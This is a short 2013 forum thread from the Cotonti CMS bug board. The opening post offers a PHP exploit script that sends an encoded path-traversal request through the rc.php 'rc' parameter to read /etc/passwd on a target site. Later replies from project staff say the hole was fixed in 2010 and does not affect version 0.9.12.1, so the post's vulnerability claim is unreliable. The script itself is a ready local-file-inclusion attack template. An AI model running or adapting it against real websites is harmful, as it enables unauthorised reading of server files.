Cotonti / Open Source PHP Content Management FrameworkContent Management Framework

Forums / Cotonti / Bugs / Siena LFI hacking

MecTruy
#1 2013-02-17 00:39


Members
Thanked: 4 times

LFI attack Cotonti Siena 0.9.12.1 LFI


<?php
/* 
*  WWW.PUNISH3R.COM
*  Bug               :Cotonti Siena 0.9.12.1 LFI
*  Author(Pentester) : FreWaL & Dr.Ly0n
*  Special Thanks    : Z0rLu, MaXtoR, MecTruy, Polonia, Monarchy, Eno7, RedWorm, R00tk!d, Harded, The_Mirkin and PUNISH3R all special user
*
*/
$hedef  = "http://hedefsite.com";
$dosya  = ".%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fpassword";
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL, "http://$hedef/rc.php?rc=".$dosya);
curl_setopt($curl, CURLOPT_HTTPGET, 1);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($curl, CURLOPT_TIMEOUT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($curl, CURLOPT_COOKIEJAR, "/tmp/cookie_$hedef");
$cikti = curl_exec ($curl);
curl_close($curl);
unset($curl);

echo $cikti;
?>

 

Kurta sormuşlar senin ensen neden kalın ? diye, Kendi işimi kendim yaparımda ondan demiş...
Xerora
#2 2013-02-17 06:18


Team
Thanked: 16 times

This won't work on 0.9.12.1. It seems like this has been the case for many versions before 0.9.12.1 as well as far as I can tell.

edit: removed line that could be misread about the error that it would return


This post was edited by Xerora (2013-02-18 19:16, 1 years ago)
tensh
#3 2013-02-18 08:43


Contributors
Thanked: 9 times

does it work on previous Sienas? How to prevent it? Can I just delete this file?

Trustmaster
#4 2013-02-18 18:24


Administrators
Thanked: 227 times

Seriously, this was fixed in 2010. It is incorrect to say that 0.9.12.1 is vulnerable.

May the Source be with you!